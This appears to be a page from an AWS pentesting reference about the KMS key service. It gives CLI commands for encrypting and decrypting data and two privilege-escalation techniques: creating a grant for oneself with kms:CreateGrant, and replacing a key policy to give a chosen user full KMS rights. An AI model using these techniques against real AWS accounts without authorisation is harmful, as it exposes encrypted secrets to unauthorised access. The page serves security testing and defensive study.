KMS

KMS overview and attacks

Encrypt and Decrypt data with KMS Key

Encrypt Data

aws kms encrypt --key-id <keyId> --plaintext <plaintextData>

Decrypt Data

aws kms decrypt \
    --ciphertext-blob lkaj3n3lkLKND0F3NL \
    --key-id <keyId> \
    --output text \
    --query Plaintext | base64 \
    --decode

kms:CreateGrant

With this action available, you can provide yourself a Grant to a KMS key and effectively give yourself access.
Grants are considered along with key policies and IAM policies and often used for temporary permissions because you can create one, use its permissions, and delete it without changing your key policies or IAM policies.

aws kms create-grant --key-id <keyId> --grantee-principal <userARN> --operations Decrypt

# decrypt data with the grant
aws kms decrypt --grant-tokens <grantToken> --ciphertext-blob <cipherText> --key-id <keyId> --output text --query Plaintext | base64 --decode

kms:PutKeyPolicy

With this action available, you can update or replace the Key Policy for a KMS key to give yourself permissions.

aws kms put-key-policy --policy file://key-policy.json --policy-name default --key-id <keyId>

# sample key policy

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "AWS": "arn:aws:iam::123456789012:role/root"
            },
            "Action": "kms:*",
            "Resource": "*"
        },
        {
            "Effect": "Allow",
            "Principal": {
                "AWS": "arn:aws:iam::123456789012:user/<userName>"
            },
            "Action": [
                "kms:*"
            ],
            "Resource": "*"
        }
    ]
}

PreviousIdentity Providers NextLightsail

Last updated 1 month ago